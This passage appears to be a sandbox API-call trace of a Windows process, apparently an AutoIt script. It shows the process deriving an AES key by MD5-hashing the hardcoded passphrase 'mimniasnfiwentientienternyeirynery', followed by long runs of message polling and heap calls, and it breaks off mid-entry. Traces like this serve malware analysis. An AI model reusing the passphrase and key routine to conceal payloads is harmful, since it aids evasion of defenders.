20 [0075.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0075.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0075.516] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0075.517] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.517] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.517] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.517] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.517] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.517] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.517] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.517] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.517] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0075.517] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.518] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.518] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0075.518] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0075.518] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.518] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.518] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.518] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.522] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0075.522] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.522] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0075.522] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0075.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca5b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0075.522] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0075.522] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.522] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.522] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.522] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0075.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0075.522] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0075.522] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0075.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0075.523] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.523] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.523] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0075.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0075.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca958, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0075.524] CryptHashData (hHash=0x41ac440, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0075.524] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.524] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.524] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.524] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0075.524] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.524] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0075.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0075.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca508, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0075.524] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac440, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0075.524] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.524] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.524] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.524] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.524] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.524] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0075.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0075.525] CryptDestroyHash (hHash=0x41ac440) returned 1 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0075.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0075.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0075.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0075.526] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0075.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0075.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0075.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0075.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0075.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: 